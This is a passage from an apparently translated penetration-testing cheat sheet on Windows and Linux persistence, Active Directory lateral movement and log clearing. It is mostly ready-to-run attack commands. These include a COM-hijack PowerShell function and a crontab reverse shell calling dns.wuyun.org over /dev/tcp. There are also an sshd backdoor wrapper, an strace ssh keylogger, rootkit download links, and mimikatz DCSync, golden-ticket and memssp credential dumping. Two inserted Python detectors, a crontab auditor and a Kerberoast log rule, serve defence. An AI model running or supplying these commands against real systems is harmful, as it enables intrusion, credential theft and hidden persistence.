Hijacks the UserTask scheduled task so that a DLL is loaded at system start
function Invoke-ScheduledTaskComHandlerUserTask {
    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
    Param (
        [Parameter(Mandatory = $True)]
        [ValidateNotNullOrEmpty()]
        [String]$Command,
        [Switch]$Force
    )
    $ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"
    if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)) {
        New-Item $ScheduledTaskCommandPath -Force | New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
    } else {
        Write-Verbose "Key already exists, consider using -Force"
        exit
    }
    if (Test-Path $ScheduledTaskCommandPath) {
        Write-Verbose "Created registry entries to hijack the UserTask"
    } else {
        Write-Warning "Failed to create registry key, exiting"
        exit
    }
}
Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose
15. Netsh
https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/
netsh add helper c:\test\netshtest.dll
Backdoor trigger: every invocation of netsh
DLL source: https://github.com/outflanknl/NetshHelperBeacon
16. Shim
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims/
Common modes: InjectDll, RedirectShortcut, RedirectEXE
17. DLL hijacking
https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95/
Use Rattler to enumerate processes automatically and detect which ones are open to DLL hijacking. Usage: semi-automatic testing with Procmon is more precise; a generically generated DLL makes the program error out or abort, whereas a hijack DLL built from AheadLib-generated source does not disrupt program execution.
Tools: https://github.com/sensepost/rattler ; https://github.com/Yonsm/AheadLib
18. DoubleAgent
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)/
- Write a custom Verifier provider DLL
- Install it through Application Verifier
- Inject into the target process and run the payload
- The payload runs every time the target process starts, which amounts to an autostart
POC: https://github.com/Cybellum/DoubleAgent
19. waitfor.exe
https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/
Does not support autostart, but can be activated remotely on demand; the background process shows up as waitfor.exe. POC: https://github.com/3gstudent/Waitfor-Persistence
20. AppDomainManager
https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/
For .NET programs: modifying the AppDomainManager hijacks a .NET program's startup. Hijacking the startup of a common system .NET program such as powershell.exe and adding a payload to it gives a passively triggered backdoor.
21. Office
Hijacking specific Office features:
https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/
Trigger a backdoor via DLL hijacking when Office performs a specific function; an Office backdoor implemented with VSTO; Office add-ins:
- Word WLL
- Excel XLL
- Excel VBA add-ins
- PowerPoint VBA add-ins
Reference 1: https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/
Reference 2: https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/
22. CLR
https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/
A backdoor that needs no administrator privileges and hijacks all .NET programs. POC: https://github.com/3gstudent/CLR-Injection
23. msdtc
https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/
Uses the MSDTC service to load a DLL, achieving autostart while evading Autoruns' startup-item checks. Usage: place the DLL in the %windir%\system32\ directory renamed as oci.dll
24. Hijack CAccPropServicesClass and MMDeviceEnumerator
https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator/
Uses COM components; no reboot and no administrator privileges required; implemented by modifying the registry. POC: https://github.com/3gstudent/COM-Object-hijacking
25. Hijack explorer.exe
https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe/
COM component hijacking; no reboot and no administrator privileges required; implemented by modifying the registry
HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}
HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKCU\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKCU\Software\Classes\Wow6432Node\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}
26. Windows FAX DLL injection
DLL hijacking of Explorer.exe's load of fxsst.dll: Explorer.exe loads c:\Windows\System32\fxsst.dll at startup (the fax service is enabled by default). Saving payload.dll as c:\Windows\fxsst.dll achieves the hijack of Explorer.exe's load of fxsst.dll.
27. Special registry key names
Create registry values with special names under the startup keys: users normally cannot read them (via the Win32 API), but the system can still execute them (via the Native API).
"Penetration tricks: creating 'hidden' registry keys"
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA/
"Penetration tricks: more tests on 'hidden' registry keys"
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95/
28. Shortcut backdoor
Replace the launch parameters of the "My Computer" shortcut. POC:
https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1
29. Logon Scripts
https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/
New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | Out-Null
30. Password Filter DLL
https://3gstudent.github.io/3gstudent.github.io/Password-Filter-DLL%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/
31. IE browser hijacking via a BHO
https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BHO%E5%AE%9E%E7%8E%B0IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%8A%AB%E6%8C%81/
Linux
crontab
Sends a reverse shell to port 53 of dns.wuyun.org every 60 minutes
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c")|crontab -
Hard-linked sshd
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;
Connect: ssh root@192.168.206.142 -p 2333
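The crontab entry above is worth a second look from the defensive side: the printf ends with a carriage return followed by "no crontab for <user>" padded with spaces, so `crontab -l` appears to print nothing while the reverse-shell line is still in the spool file. The following is an added example, not code from the original page: it reproduces that terminal rendering and audits the raw spool text instead, using a constructed crontab.

```python
"""Audit a user's raw crontab for reverse-shell entries and the display-hiding trick.

Added example for this write-up, not code from the original page. The
constructed crontab contains the kind of entry shown above: a /dev/tcp reverse
shell followed by "\\rno crontab for root" and padding, which a terminal renders
as a harmless message. Read the spool file, not the `crontab -l` output.
"""
from __future__ import annotations

import re

SUSPICIOUS = [
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp network redirection"),
    (re.compile(r"\bnc\b.*\s-e\s"), "netcat with -e"),
    (re.compile(r"\bbash\s+(--noprofile\s+)?-i\b"), "interactive shell spawned from cron"),
    (re.compile(r"\r"), "carriage return (hides the rest of the entry in crontab -l)"),
]

# Constructed raw crontab text, as read from /var/spool/cron/crontabs/<user>
SAMPLE_CRONTAB = (
    "0 2 * * * /usr/local/bin/backup.sh\n"
    "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;"
    "/bin/bash --noprofile -i;\rno crontab for root" + " " * 100 + "\n"
    "@daily /usr/bin/updatedb\n"
)


def terminal_view(line: str) -> str:
    """Render a line as a terminal shows it: \\r returns to column 0, later text overwrites."""
    buf: list[str] = []
    col = 0
    for ch in line:
        if ch == "\r":
            col = 0
            continue
        if col < len(buf):
            buf[col] = ch
        else:
            buf.append(ch)
        col += 1
    return "".join(buf).rstrip()


def audit_crontab(text: str) -> list[dict]:
    """Return one finding per non-comment line that matches any SUSPICIOUS pattern."""
    findings = []
    for number, line in enumerate(text.split("\n"), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        reasons = [desc for pat, desc in SUSPICIOUS if pat.search(line)]
        if reasons:
            findings.append({
                "line": number,
                "reasons": reasons,
                "shown_by_crontab_l": terminal_view(line),   # what the admin saw
                "real_entry": line.split("\r")[0],           # what cron actually runs
            })
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: displayed as {f['shown_by_crontab_l']!r}")
        print(f"  actually: {f['real_entry']}")
        for r in f["reasons"]:
            print(f"  - {r}")
```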
SSH server wrapper
cd /usr/sbin
mv sshd ../bin
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
# a restart is not strictly required
/etc/init.d/sshd restart
socat STDIO TCP4:192.168.206.142:22,sourceport=13377
SSH keylogger
Edit the current user's .bashrc and append at the end:
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
source .bashrc
Cymothoa process-injection backdoor
./cymothoa -p 2270 -s 1 -y 7777
nc -vv ip 7777
rootkit
- openssh_rootkit: http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
- Kbeast_rootkit: http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
- Mafix + Suterusu rootkit
Tools
- Vegile: https://github.com/Screetsec/Vegile
- backdoor: https://github.com/icco/backdoor
Web backdoors
PHP Meterpreter backdoor, Aspx Meterpreter backdoor, weevely, webacoo, ...
0x06 Lateral movement
1. Port-based penetration
Port scanning
- 1. Port fingerprint (version information)
- 2. The service running on the port
- 3. Common default port numbers
- 4. Try weak passwords
Port brute forcing
hydra: https://github.com/vanhauser-thc/thc-hydra
Weak passwords on ports
- NTScan
- Hscan
- Self-written scripts
Port overflows
smb
- ms08067
- ms17010
- ms11058
- ...
apache, ftp, ...
Common default ports
1. Web (web vulnerabilities / sensitive directories)
Vulnerabilities in common third-party components: struts, thinkphp, jboss, ganglia, zabbix, ...
80 web; 80-89 web; 8000-9090 web
2. Databases (scan for weak passwords)
1433 MSSQL; 1521 Oracle; 3306 MySQL; 5432 PostgreSQL; 50000 DB2
3. Special services (unauthorized access / command execution / vulnerabilities)
- 443 SSL Heartbleed
- 445 ms08067 / ms11058 / ms17010, etc.
- 873 Rsync unauthorized access
- 5984 CouchDB http://xxx:5984/_utils/
- 6379 redis unauthorized access
- 7001,7002 WebLogic default weak password, deserialization
- 9200,9300 elasticsearch (see WooYun: ElasticSearch command execution on a Duowan server)
- 11211 memcache unauthorized access
- 27017,27018 Mongodb unauthorized access
- 50000 SAP command execution
- 50070,50030 hadoop default ports, unauthorized access
4. Common ports (scan for weak passwords / port brute forcing)
- 21 ftp
- 22 SSH
- 23 Telnet
- 445 SMB weak-password scanning
- 2601,2604 zebra routing, default password zebra
- 3389 Remote Desktop
5. Full list of ports and the services they map to
- 21 ftp
- 22 SSH
- 23 Telnet
- 25 SMTP
- 53 DNS
- 69 TFTP
- 80 web
- 80-89 web
- 110 POP3
- 135 RPC
- 139 NETBIOS
- 143 IMAP
- 161 SNMP
- 389 LDAP
- 443 SSL Heartbleed and some web vulnerability testing
- 445 SMB
- 512,513,514 Rexec
- 873 Rsync unauthorized access
- 1025,111 NFS
- 1080 socks
- 1158 ORACLE EMCTL
- 2601,2604 zebra routing, default password zebra
- 1433 MSSQL (brute force)
- 1521 Oracle (iSqlPlus port: 5560, 7778)
- 2082/2083 cPanel hosting control panel login (common abroad)
- 2222 DA hosting control panel login (common abroad)
- 2601,2604 zebra routing, default password zebra
- 3128 squid proxy default port; if no password is set, you can very likely roam the internal network directly
- 3306 MySQL (brute force)
- 3312/3311 kangle hosting control panel login
- 3389 Remote Desktop
- 3690 svn
- 4440 rundeck (see WooYun: roaming Sina's internal network via a certain Sina service)
- 4848 GlassFish web middleware, weak password: admin/adminadmin
- 5432 PostgreSQL
- 5900 vnc
- 5984 CouchDB http://xxx:5984/_utils/
- 6082 varnish (see WooYun: unauthorized access to the Varnish HTTP accelerator CLI can lead directly to site tampering or use as a proxy into the internal network)
- 6379 redis unauthorized access
- 7001,7002 WebLogic default weak password, deserialization
- 7778 Kloxo hosting control panel login
- 8000-9090 common web ports; some ops teams put admin back-ends on these non-80 ports
- 8080 tomcat / WDCP hosting control panel, default weak password
- 8080,8089,9090 JBOSS
- 8081 Symantec AV/Filter for MSE
- 8083 Vestacp hosting control panel (common abroad)
- 8649 ganglia
- 8888 amh/LuManager hosting control panel default port
- 9000 fcgi (FastCGI PHP execution)
- 9043 websphere [web middleware], weak passwords: admin/admin, websphere/websphere, system/manager
- 9200,9300 elasticsearch (see WooYun: ElasticSearch command execution on a Duowan server)
- 10000 Virtualmin/Webmin server virtual hosting control panel
- 11211 memcache unauthorized access
- 27017,27018 Mongodb unauthorized access
- 28017 mongodb statistics page
- 50000 SAP command execution
- 50060 hadoop
- 50070,50030 hadoop default ports, unauthorized access
2. Domain penetration
Information gathering
powerview.ps1
Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer's domain
Get-NetCurrentUser - gets the current [domain\]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organization units
Get-NetGUIDOUs - finds domain OUs linked to a specific GUID
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - get a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server
BloodHound
Get the information of all machines under a given OU
{
  "name": "Find the specified OU computers",
  "queryList": [
    {
      "final": false,
      "title": "Select a OU...",
      "query": "MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC"
    },
    {
      "final": true,
      "query": "MATCH (m:OU {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]->(n:Computer) RETURN p",
      "allowCollapse": true,
      "endNode": "{}"
    }
  ]
}
Automatically mark owned users and machines
SyncDog
https://github.com/Lz1y/SyncDog
Obtaining DNS information from the domain
- adidnsdump: https://github.com/dirkjanm/adidnsdump
- Domain penetration: obtaining DNS records: https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-DNS%E8%AE%B0%E5%BD%95%E7%9A%84%E8%8E%B7%E5%8F%96/
Methods for taking over the domain controller
SYSVOL
SYSVOL is the shared folder that stores the domain's public file server replica and is replicated between all domain controllers in the domain. The Sysvol folder is created when AD is installed and holds GPOs, scripts and similar data; whatever is placed in Sysvol is replicated to every DC in the domain. Related reading:
- Finding passwords in SYSVOL and attacking GPP (Group Policy Preferences): http://www.freebuf.com/vuls/92016.html
- Windows Server 2008 R2, part 4: managing the Sysvol folder: http://blog.51cto.com/ycrsjxy/203095
- Finding passwords in SYSVOL and exploiting Group Policy Preferences: https://adsecurity.org/?p=2288
- Recovering passwords stored in Group Policy from SYSVOL: https://xz.aliyun.com/t/1653
MS14-068 Kerberos
python ms14-068.py -u <domain user>@<domain> -p <password> -s <user SID> -d <domain host>
Use mimikatz to load the resulting TGT_domainuser@SERVER.COM.ccache into memory, creating the cached ticket:
mimikatz.exe "kerberos::ptc c:\TGT_darthsidious@pentest.com.ccache" exit
net use k: \\pentest.com\c$
Related reading:
- PyKEK Kerberos toolkit: http://adsecurity.org/?p=676
- In-depth analysis of MS14-068: http://www.freebuf.com/vuls/56081.html
- Kerberos security vulnerabilities: https://adsecurity.org/?p=541
SPN scanning
Kerberoast is an effective way to extract service-account credentials from Active Directory as an ordinary user, without sending any packets to the target system. An SPN is the unique identifier of a service on a network that uses Kerberos authentication; it consists of a service class, a host name and a port. On a Kerberos network, an SPN must be registered for a server under either a built-in computer account (such as NetworkService or LocalSystem) or a user account. For built-in accounts the SPN is registered automatically, but if a service runs under a domain user account, the SPN must be registered manually for that account. The main benefit of SPN scanning is that it does not need to connect to every IP on the network to check service ports: it performs service discovery through LDAP queries against the domain controller, and since SPN queries are part of normal Kerberos ticket behaviour, SPN scanning is hard to detect. Related reading:
- Locating SQL Servers without scanning: https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/
- SPN scanning: https://adsecurity.org/?p=1508
- Script for scanning SQL Server: https://github.com/PyroTek3/PowerShell-AD-Recon
Kerberos golden ticket
Hashes captured on the domain:
lsadump::dcsync /domain:pentest.com /user:krbtgt
kerberos::purge
kerberos::golden /admin:administrator /domain:<domain> /sid:<SID> /krbtgt:<hash> /ticket:administrator.kiribi
kerberos::ptt administrator.kiribi
kerberos::tgt
net use k: \\pentest.com\c$
Related reading:
- https://adsecurity.org/?p=1640
- Cracking domain service accounts in practice: http://bobao.#/learning/detail/3564.html
- Kerberos authentication principles: https://blog.csdn.net/wulantian/article/details/42418231
- Understanding Windows authentication (NTLM & Kerberos) in depth: https://klionsec.github.io/2016/08/10/ntlm-kerberos/
Kerberos silver ticket
Some differences between golden tickets and silver tickets:
- Golden Ticket: forges a TGT and grants access to any Kerberos service; Silver Ticket: forges a TGS and can only access the specified service
- Different encryption: a Golden Ticket is encrypted with the krbtgt hash; a Silver Ticket with the service account's (usually the computer account's) hash
- Different authentication flow: a golden ticket has to talk to the domain controller when used; a silver ticket does not
Related reading:
- How attackers use Kerberos silver tickets to exploit systems: https://adsecurity.org/?p=2011
- Domain penetration: Pass The Ticket: https://www.feiworks.com/wy/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.pdf
Domain service account cracking
Same principle as the SPN scanning above: https://github.com/nidem/kerberoast . Get all accounts used as SPNs:
setspn -T PENTEST.com -Q */*
Extract the obtained tickets from RAM with Mimikatz:
kerberos::list /export
Crack with tgsrepcrack:
tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
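The SPN scanning section above says this technique is hard to detect because SPN queries look like normal Kerberos traffic. The one trace it does leave is the service ticket request itself: Kerberoast tooling asks for RC4-encrypted (etype 0x17) TGS tickets for many user-account SPNs in a short burst, and each request is logged on the domain controller as Security Event ID 4769. The following Python is an added example, not code from the original article or from the kerberoast project: it applies that rule to constructed 4769 records (the domain PENTEST.COM, the users, hosts and service names are all made up) and reports accounts that requested RC4 tickets for several distinct user SPNs inside a five-minute window, while ignoring machine accounts, krbtgt and failed requests.

```python
"""Spot Kerberoast-style service ticket requests in Windows Security events.

Added example (not from the original article). The input is a constructed
set of Event ID 4769 fields; in production you would feed it the parsed
EVTX/XML fields with the same meaning.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Value logged in the TicketEncryptionType field of 4769 for RC4-HMAC.
RC4_HMAC = "0x17"

# Constructed sample events (hypothetical domain PENTEST.COM, made-up hosts).
SAMPLE_4769 = [
    # Normal workstation traffic: AES ticket for a machine-account SPN.
    {"time": "2024-03-01T10:00:01", "account": "alice@PENTEST.COM", "ip": "10.0.0.5",
     "service": "WS01$", "enc": "0x12", "status": "0x0"},
    # A single RC4 request for an old service account (expected for legacy apps).
    {"time": "2024-03-01T10:00:05", "account": "alice@PENTEST.COM", "ip": "10.0.0.5",
     "service": "svc_legacy", "enc": "0x17", "status": "0x0"},
    # Burst: one account requests RC4 tickets for many user-account SPNs in seconds.
    {"time": "2024-03-01T11:30:00", "account": "bob@PENTEST.COM", "ip": "10.0.0.77",
     "service": "svc_sql", "enc": "0x17", "status": "0x0"},
    {"time": "2024-03-01T11:30:01", "account": "bob@PENTEST.COM", "ip": "10.0.0.77",
     "service": "svc_iis", "enc": "0x17", "status": "0x0"},
    {"time": "2024-03-01T11:30:01", "account": "bob@PENTEST.COM", "ip": "10.0.0.77",
     "service": "svc_backup", "enc": "0x17", "status": "0x0"},
    {"time": "2024-03-01T11:30:02", "account": "bob@PENTEST.COM", "ip": "10.0.0.77",
     "service": "svc_exchange", "enc": "0x17", "status": "0x0"},
    # krbtgt and machine accounts are excluded from the rule even with RC4.
    {"time": "2024-03-01T11:30:03", "account": "bob@PENTEST.COM", "ip": "10.0.0.77",
     "service": "krbtgt", "enc": "0x17", "status": "0x0"},
    # A failed request (status != 0x0) is ignored.
    {"time": "2024-03-01T11:30:04", "account": "bob@PENTEST.COM", "ip": "10.0.0.77",
     "service": "svc_old", "enc": "0x17", "status": "0x6"},
]


def is_roastable_request(ev):
    """True for a successful RC4 service-ticket request against a user-account SPN.

    Machine accounts end with '$' and krbtgt is the TGT service; neither is a
    Kerberoast target, so both are filtered out.
    """
    svc = ev["service"].lower()
    if ev["status"] != "0x0" or ev["enc"] != RC4_HMAC:
        return False
    if svc.endswith("$") or svc == "krbtgt":
        return False
    return True


def find_kerberoast_bursts(events, window=timedelta(minutes=5), min_services=3):
    """Group roastable requests by requesting account and flag bursts.

    Returns {account: sorted distinct services} for every account that asked
    for RC4 tickets for at least `min_services` distinct user SPNs inside any
    interval of length `window`. Events are sorted per account first so the
    sliding window is correct regardless of input order.
    """
    per_account = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            per_account[ev["account"]].append(
                (datetime.fromisoformat(ev["time"]), ev["service"].lower())
            )

    flagged = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) >= min_services:
                flagged[account] = sorted(in_window)
                break
    return flagged


if __name__ == "__main__":
    for account, services in find_kerberoast_bursts(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

The thresholds are deliberately parameters: environments with many legacy services that still negotiate RC4 will need a higher `min_services`, and the more durable fix is to move service accounts to AES-only keys so that an RC4 request stands out on its own.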
Credential theft
Look for administrator passwords among the passwords collected so far.
NTLM relay
One API call away from Domain Admin: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
privexchange: https://github.com/dirkjanm/privexchange/
Exchange2domain: https://github.com/ridter/exchange2domain
Kerberos delegation
Wagging the Dog: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
s4u2pwnage: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Attacking Kerberos Delegation: https://xz.aliyun.com/t/2931
Using the print service to take over a domain controller: https://adsecurity.org/?p=4056
Computer Takeover: https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
Combining NTLM Relaying and Kerberos delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
CVE-2019-1040: https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/
Address Resolution Protocol (ARP)
Only fall back to ARP when nothing else works.
Obtaining AD hashes
- Use VSS volume shadow copies
- Obtain the NTDS.DIT file with Ntdsutil
- Extract NTDS.DIT from PowerShell --> Invoke-NinaCopy
- Extract with Mimikatz
mimikatz lsadump::lsa /inject exit
- Use PowerShell Mimikatz
- Use Mimikatz DCSync to dump Active Directory credentials remotely. Extract the password data of the KRBTGT account:
Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt" exit
Extract the password data of the Administrator account:
Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit
- Extract hashes from NTDS.dit: recover it with esedbexport, then extract with ntdsxtract
AD persistence
Active Directory persistence tricks
https://adsecurity.org/?p=1929
DS Restore Mode password maintenance: DSRM password synchronization
Windows Server 2008 needs the KB961320 update installed to support DSRM password synchronization; Windows Server 2003 does not support it. KB961320: https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni . See also: [Using DSRM password synchronization to persist domain controller privileges](http://drops.xmd5.com/static/drops/tips-9297.html)
DCShadow
https://www.dcshadow.com/
Security Support Provider
Put simply, an SSP is a DLL that implements authentication.
privilege::debug
misc::memssp
No reboot is needed this way; the newly generated file kiwissp.log can be found in c:/windows/system32.
SID History
https://adsecurity.org/?p=1772
SID History allows one account's access to be effectively cloned onto another account.
mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator"
AdminSDHolder & SDProp
Using AdminSDHolder & SDProp to (re)gain domain admin privileges
Group Policy
https://adsecurity.org/?p=2716
Using Group Policy Objects for persistence and lateral movement: https://www.anquanke.com/post/id/86531
Hook PasswordChangeNotify
http://www.vuln.cn/6812
Kerberoasting backdoor
https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting/
AdminSDHolder
Backdooring AdminSDHolder for Persistence: https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence
Delegation
Unconstrained Domain Persistence: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence
Other
Privilege escalation on domain hosts
SharpAddDomainMachine: https://github.com/Ridter/SharpAddDomainMachine
Exploiting Exchange
Exchange2domain: https://github.com/Ridter/Exchange2domain
CVE-2018-8581: https://github.com/WyAtu/CVE-2018-8581/
CVE-2019-1040: https://github.com/Ridter/CVE-2019-1040
CVE-2020-0688: https://github.com/Ridter/CVE-2020-0688
NtlmRelayToEWS: https://github.com/Arno0x/NtlmRelayToEWS
ewsManage: https://github.com/3gstudent/ewsManage
TIPS
"Domain penetration: Dump Clear-Text Password after KB2871997 installed": https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed
"Domain penetration: Hook PasswordChangeNotify": http://www.vuln.cn/6812
Hook PasswordChangeNotify can be used to record domain administrators' new passwords in real time.
"Domain penetration: Local Administrator Password Solution": http://www.liuhaihua.cn/archives/179102.html
During domain penetration, remember to keep an eye on the local administrator accounts of domain hosts.
"Domain penetration: Using SYSVOL to recover passwords saved in Group Policy": https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/
Related tools
BloodHound: https://github.com/BloodHoundAD/BloodHound
CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
DeathStar: https://github.com/byt3bl33d3r/DeathStar (usage walkthrough: http://www.freebuf.com/sectool/160884.html)
Executing programs on remote systems
- At
- Psexec
- WMIC
- Wmiexec
- Smbexec
- Powershell remoting
- DCOM
- Winrm (https://github.com/Hackplayers/evil-winrm)
IoT
1. Routers: routersploit https://github.com/reverse-shell/routersploit
2. Printers: PRET https://github.com/RUB-NDS/PRET
3. IoT exploits: https://www.exploitee.rs/
4. Related: OWASP-Nettacker https://www.owasp.org/index.php/OWASP_Nettacker, isf, icsmaster
Man-in-the-middle
Cain: http://www.oxid.it/cain.html
Ettercap: https://github.com/Ettercap/ettercap
Responder: https://github.com/SpiderLabs/Responder
MITMf: https://github.com/byt3bl33d3r/MITMf
bettercap: https://github.com/evilsocket/bettercap
Evading AV and detection
Bypass AppLocker
UltimateAppLockerByPassList: https://lolbas-project.github.io/
Bypass AV
Empire, PEspin, Shellter, Ebowla, Veil, PowerShell/Python code injection techniques, Process Doppelgänging (http://www.4hou.com/technology/9379.html) ...
0x07 Trace cleanup
Clearing Windows logs
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87/
List the log categories:
wevtutil el >1.txt
Get statistics for a single log category, e.g.:
wevtutil gli "windows powershell"
Output:
creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1
View the contents of a given log:
